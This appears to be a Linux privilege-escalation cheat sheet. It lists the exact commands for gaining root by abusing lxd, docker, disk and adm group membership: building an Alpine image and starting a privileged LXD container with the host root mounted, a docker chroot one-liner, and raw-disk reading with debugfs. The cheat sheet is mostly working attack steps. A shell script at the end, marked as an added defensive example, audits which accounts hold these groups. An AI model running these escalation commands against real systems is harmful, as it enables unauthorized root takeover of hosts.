PRIMARY CATEGORY → LINUX PRIVESC
Enumeration
id
groups "$USER"
LXC | LXD
Manual Exploitation
Downloading the Build Alpine
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-name
Building Alpine
From the Attacker ⚔️
bash ./build-alpine
Creating the Container
lxd init
lxc image import <ALPINE_TAR_GZ> --alias alpine
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc giveMeRoot disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc sh # Or lxc exec privesc /bin/bash
ExploitDB
Downloading the Build Alpine
From the Attacker ⚔️
curl --silent --location --request GET 'https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine' --remote-name
Building Alpine
From the Attacker ⚔️
bash ./build-alpine
Running the Exploit
From the Target 🎯
bash script.bash
Once inside the container, just go to /mnt/root to see all resources from the host machine.
Docker
If the current user belongs to the docker group, we can spawn new docker containers and compromise the entire machine using volumes by mounting the system root / on the container's /mnt directory:
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
Disk
Members of this group have full access to any existing device within /dev, which means that file system permissions are ignored, so we can read the entire file system from the raw disk.
To do so, we use debugfs:
debugfs <DISK> # debugfs /dev/sda1
ADM
Users belonging to this group can read all logs stored in the /var/log/ directory, so an attacker could gather sensitive data from the log files.
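Auditing these memberships from the defender's side: the script below is an added example, not part of the original notes. It lists every account in the lxd, docker, disk or adm group, including accounts that hold one of them as their primary group, which the member list in /etc/group does not show. The function names and the sample accounts are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit who holds the root-equivalent groups from these notes.
# Reads group(5)/passwd(5) format files; prints sorted "group:user:kind" lines.
RISKY_GROUPS="lxd docker disk adm"

audit_priv_groups() {
    group_file="${1:-/etc/group}"
    passwd_file="${2:-/etc/passwd}"
    awk -F: -v risky="$RISKY_GROUPS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
        # First file (group): name:passwd:gid:member,member
        FNR == NR {
            if ($1 in want) {
                gid2name[$3] = $1
                m = split($4, members, ",")
                for (i = 1; i <= m; i++)
                    if (members[i] != "") print $1 ":" members[i] ":supplementary"
            }
            next
        }
        # Second file (passwd): field 4 is the primary GID, which the
        # member list in the group file does not show.
        ($4 in gid2name) { print gid2name[$4] ":" $1 ":primary" }
    ' "$group_file" "$passwd_file" | sort -u
}

# Constructed sample data (hypothetical accounts, not from a real host).
demo_audit() {
    tmp="$(mktemp -d)" || return 1
    cat > "$tmp/group" <<'EOF'
root:x:0:
adm:x:4:syslog,alice
disk:x:6:
docker:x:998:bob
lxd:x:110:alice
users:x:100:carol
EOF
    cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/bash
backup:x:34:6::/var/backups:/usr/sbin/nologin
EOF
    audit_priv_groups "$tmp/group" "$tmp/passwd"
    rm -rf "$tmp"
}

demo_audit
```

Calling audit_priv_groups with no arguments audits the local /etc/group and /etc/passwd. On hosts with directory-backed accounts, pass it files produced by getent group and getent passwd instead.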